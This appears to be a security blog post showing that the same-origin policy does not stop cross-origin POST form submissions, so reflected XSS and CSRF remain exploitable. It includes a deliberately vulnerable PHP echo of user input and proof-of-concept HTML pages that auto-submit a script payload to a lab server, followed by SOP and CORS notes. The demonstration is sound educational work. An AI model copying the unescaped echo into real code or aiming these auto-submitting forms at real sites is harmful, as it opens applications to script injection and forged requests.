XSS, CSRF and SOP Mythbuster

I was asked if reflected Cross site scripting (XSS) in POST would be stopped or mitigated by Same origin policy(SOP)? Hmmm...interesting question. As far as I could recall, I answered, simple post submission by html forms are not stopped by SOP.

There seems to be a misconception that POST cross domain request are not allowed due to SOP and that XSS in POST is only exploited in cases of stored XSS. Also that, reflected XSS is exploitable only is GET cases.

Oh well, why believe what anyone says, lets test it out. To test this I will set up a simple html page on victim server(10.211.55.2),  lets call it input page which  takes a comment and post it to post.php page. The post.php page suffers from a serious case of reflected XSS.

<form action="post.php" method="post">
 <input type="text" name="comment" value="">
 <input type="submit" name="submit" value="Submit">
</form>

post.php

<?php
echo $_POST["comment"];

Now lets create a simple html page to exploit it. I was too lazy to create one myself so i decided burp should do it for me. We can call it, test.html.

<html>

  <!-- Simple Post submissions are not blocked by Same origin policy-->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="http://10.211.55.2/xss/post.php" method="POST">

      <input type="hidden" name="comment" value="testw&lt;script&gt;alert&#40;12345&#41;&lt;&#47;script&gt;wxvu2" />

      <input type="hidden" name="submit" value="Submit" />

      <input type="submit" value="Submit request" />

    </form>

  </body>

</html>

Now for the sake of this proof of concept to proceed, let us assume an attacker was able to redirect users to his malicious web server, serving test.html, or just sends this html page as an attachment.

User visits the malicious website(10.211.55.5) on windows and opens test.html...

...and submits the post form to execute XSS which is hosted on 10.211.55.2.

Taking it a step further so that we can call a javascript to "click" the submit button. Javascripts can be used to simulate a post form submission.

<!DOCTYPE html>

<html>

  <!-- Simple Post submissions are not blocked by Same origin policy-->

  <body>

  <script>history.pushState('', '', '/')</script>

    <form action="http://10.211.55.2/xss/post.php" method="POST">

      <input type="hidden" name="comment" value="testw&lt;script&gt;alert&#40;12345&#41;&lt;&#47;script&gt;wxvu2" />

      <input type="hidden" name="submit" value="Submit" />

      <input type="submit" id ="ert" value="Submit request" />

    </form>

  </body>

<script>

document.getElementById("ert").submit();

</script>

</html>

This happens because "The same origin policy is not enforced for all requests. Among others the <script>- and <img>-tags may fetch resources from any domain. Posting forms and linking to other domains is possible, too. "

We can easily extend this to malicious CSRF form submissions. 

So in essence we can conclude:

1. Reflected POST xss can be exploited the same as POST xss, i.e. sending the user to malicious link and use javascript to auto submit the xss post form.

2. Same origin policy does not apply to Cross domain POST form submissions, hence SOP is not a mitigating factor for POST XSS or CSRF. 

References:

https://security.stackexchange.com/questions/8264/why-is-the-same-origin-policy-so-important
https://www.sitepoint.com/php-security-cross-site-scripting-attacks-xss/
https://w-shadow.com/blog/2008/11/20/cross-domain-post-with-javascript/

SOP & CORS

SOP

Origin - Two pages have the same origin if the protocol, port (if one is specified), and host are the same for both pages.

Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin.

Assume you are logged into Facebook and visit a malicious website in another browser tab. Without the same origin policy JavaScript on that website could do anything to your Facebook account that you are allowed to do.

But of course Facebook wants to use JavaScript to enhance the user experience. So it is important that the browser can detect that this JavaScript is trusted to access Facebook resources. That's where the same origin policy comes into play: If the JavaScript is included from a HTML page on facebook.com, it may access facebook.com resources.

The origin of a JavaScript file is defined by the domain of the HTML page which includes it. So if you include the Google Analytics code with a <script>-tag, it can do anything to your website but does not have same origin permissions on the Google website.

The same origin policy is not enforced for all requests. Among others the <script>- and <img>-tags may fetch resources from any domain.

HTTP cookies are dependent on the Same Origin Policy to ensure that sensitive information held about a certain user's activity pertains only to one site.

CORS

This cross-origin sharing standard is used to enable cross-site HTTP requests for:

• Invocations of the XMLHttpRequest or Fetch APIs in a cross-site manner, as discussed above.
• Web Fonts (for cross-domain font usage in @font-face within CSS)
• Images/video frames drawn to a canvas using drawImage.
• Stylesheets (for CSSOM access).

The Cross-Origin Resource Sharing standard works by adding new HTTP headers that allow servers to describe the set of origins that are permitted to read that information using a web browser.

Simple request

Some requests don’t trigger a CORS preflight. Those are called “simple requests” in this article. A request that doesn’t trigger a CORS preflight—a so-called “simple request”—is one that meets all the following conditions:

• The only allowed methods are:
• GET
• HEAD
• POST

The only allowed values for the Content-Type request header for simple requests are:

• application/x-www-form-urlencoded
• multipart/form-data
• text/plain

.......and more

Preflighted request

Unlike “simple requests” (discussed above), "preflighted" requests first send an HTTP request by the OPTIONS method to the resource on the other domain, in order to determine whether the actual request is safe to send.